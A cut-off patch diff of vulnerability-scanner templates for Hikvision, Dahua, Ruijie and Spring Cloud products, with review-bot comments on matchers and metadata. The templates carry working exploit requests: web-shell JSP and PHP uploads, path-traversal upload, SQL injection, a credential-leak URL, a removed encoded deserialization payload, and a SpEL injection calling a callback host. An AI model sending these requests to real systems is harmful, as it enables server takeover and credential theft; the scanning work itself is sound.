@@ -1,27 +1,48 @@ id: HIKVISION info: - name: HIKVISION + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + Content-Type: image/jpeg + + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + + - | + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: res_id + json: + - ".data.resourceUuid" + internal: true matchers: - - type: word - words: - - "nt authority\\system" + - type: dsl + dsl: + - body_2 == str2 
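Review bot: The DSL matcher `body_2 == str2` requires the fetched JSP output to be byte-identical to the random marker, but a JSP whose source is `<%out.print("...");%>` commonly emits a trailing newline from the template text around the scriptlet, which would make an otherwise successful upload fail to match; use `contains(body_2, str2) && status_code_2 == 200` instead. The uploaded `{{str1}}.jsp` is left on the server after the check, so add a `tags:` line including `intrusive` (the info block here has none) and mention the leftover file in `description`. `id: HIKVISION` is reused by several templates in this patch; a unique id such as `hikvision-eps-upload-action-rce` avoids duplicate-id warnings.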
diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml index c7afb0444b..fa3aafbfe2 100644 --- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml +++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml 
@@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.8997 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - 
Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml 
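Review bot: The rewritten `description` on the new side is not readable English (`a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.`) and no longer says what the vulnerability is; replace it with something like `The /emap/devicePoint_addImgIco endpoint of the Dahua Smart Park Comprehensive Management Platform stores a multipart upload whose filename ends in .jsp without authentication, allowing an attacker to place a JSP under /upload/emap/society_new/ and execute code on the server.` The `shell_filename` regex extractor has no `group:`, so it yields the whole `ico_res_..._on.jsp` match, which is exactly what the second request needs — a one-line comment saying so would stop someone from "fixing" it with `group: 1`. The trailing `# digest:` line is the upstream project's template signature; once this copy diverges from upstream the digest no longer corresponds to the file, so either keep the file byte-identical to upstream or drop the line.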
@@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Hikvision_Env_Information_Leakage.yaml b/poc/other/Hikvision_Env_Information_Leakage.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/other/Hikvision_Env_Information_Leakage.yaml +++ b/poc/other/Hikvision_Env_Information_Leakage.yaml 
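Review bot: The word matcher on the new side lists `loginName` and `loginPass` without `condition: and`, and nuclei's default for `words` is `or`, so any 200 page that merely contains `loginName` (a login form, for instance) is reported as a credential leak; add `condition: and` under `words`. Severity was lowered from high to medium, yet the template's own description says it returns the management account's password, which is a full compromise of the console and fits `high`. The two trailing comment lines are in Chinese; in English they read `# After extraction, log in at:` / `# /admin/login_login.action`.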
@@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + 
- type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index f2db119795..fa762ac2f6 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ b/poc/other/Ruijie_EXCU_SHELL.yaml @@ -1,33 +1,37 @@ id: Ruijie info: - name: Ruijie Switch WEB Management System EXCU_ SHELL + name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie Switch WEB Management System EXCU_ SHELL + Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges metadata: - fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" - hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" + fofa-query: app="Ruijie-NBR路由器" + hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" http: - raw: - | - GET /EXCU_SHELL HTTP/1.1 + POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Cmdnum: '1' - Command1: show running-config - Confirm1: n + Accept: text/plain, */*; q=0.01 + Content-Disposition: form-data; name="file"; filename="111.php" + Content-Type: image/jpeg + + - | + GET /321/test.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "configuration")' + - 'status_code_2 == 200' + - 'contains(body_1, "test.php")' + - 'contains(body_2, "PHP Version")' condition: and 
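Review bot: The `author` value on the new side is mangled (`zerZero Trust Security Attack and Defense Laboratoryo`); it should read `Zero Trust Security Attack and Defense Laboratory` as in the other Hikvision templates in this patch. Matching a 200 response on the single word `profiles` is also weak, since any page that mentions profiles will trigger; the path looks like a Spring Boot actuator `env` endpoint, so require a second token such a response carries (`propertySources` or `activeProfiles`, depending on version — verify against a real response) with `condition: and`, or check the `Content-Type` header for JSON. A configuration-exposure finding should not rest on one common English word.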
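Review bot: As shown, the first request sends no body after the blank line that follows `Content-Type: image/jpeg`, yet the second matcher expects `PHP Version` from `/321/test.php`, which only appears if PHP such as `<?php phpinfo(); ?>` was uploaded; either the body was lost in the rewrite or the matcher can never succeed, so add a body and match on a random marker (`<?php echo "{{str1}}"; ?>` with `contains(body_2, str1)`) rather than on phpinfo output. `Content-Disposition: form-data; ...` is sent as an HTTP header rather than inside a multipart body, so unless `fileupload.php` really reads it from the headers the server will ignore it — confirm against the reference PoC. The template also drops a fixed-name `test.php` under `../../321` with no cleanup, so it needs the `intrusive` tag, and the file is still called `Ruijie_EXCU_SHELL.yaml` although it no longer touches `/EXCU_SHELL`.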
diff --git a/poc/other/devvn-image-hotspot.yaml b/poc/other/devvn-image-hotspot.yaml new file mode 100644 index 0000000000..dfafc5b351 --- /dev/null +++ b/poc/other/devvn-image-hotspot.yaml @@ -0,0 +1,59 @@ +id: devvn-image-hotspot + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/kbucket.yaml b/poc/other/kbucket.yaml new file mode 100644 index 0000000000..1b1acc9da2 --- /dev/null +++ b/poc/other/kbucket.yaml 
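Review bot: The `description:`, `cvss-metrics:`, `cvss-score:` and `cve-id:` fields are left empty and `shodan-query: 'vuln:'` is a placeholder, while `tags` still claims `cve`; either fill them from the Wordfence advisory linked in `reference` or drop the empty keys and the `cve` tag so the template does not advertise an identifier it does not cite. A one-line description such as `Image Hotspot by DevVN <= 1.2.5 is affected by an authenticated (Author+) PHP object injection; this template only fingerprints the installed version from readme.txt and does not exercise the injection.` would also make clear that a match is a version inference, not a confirmed exploit.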
@@ -0,0 +1,59 @@ +id: kbucket + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index f08a8e8a9e..f28360d6a7 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml 
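Review bot: `description`, `cvss-metrics`, `cvss-score` and `cve-id` are empty, `shodan-query: 'vuln:'` is a placeholder, and `tags` claims `cve` without an identifier; populate them from the linked Wordfence entry or remove the empty keys and the `cve` tag. State in `description` that this is a version fingerprint, e.g. `KBucket <= 4.1.4 is affected by a reflected XSS; this template only compares the Stable tag version from readme.txt and does not test the XSS.`, so a match is not read as a confirmed finding.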
@@ -1,46 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: vulhub,cve,cve2022,springcloud,rce,kev + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - 
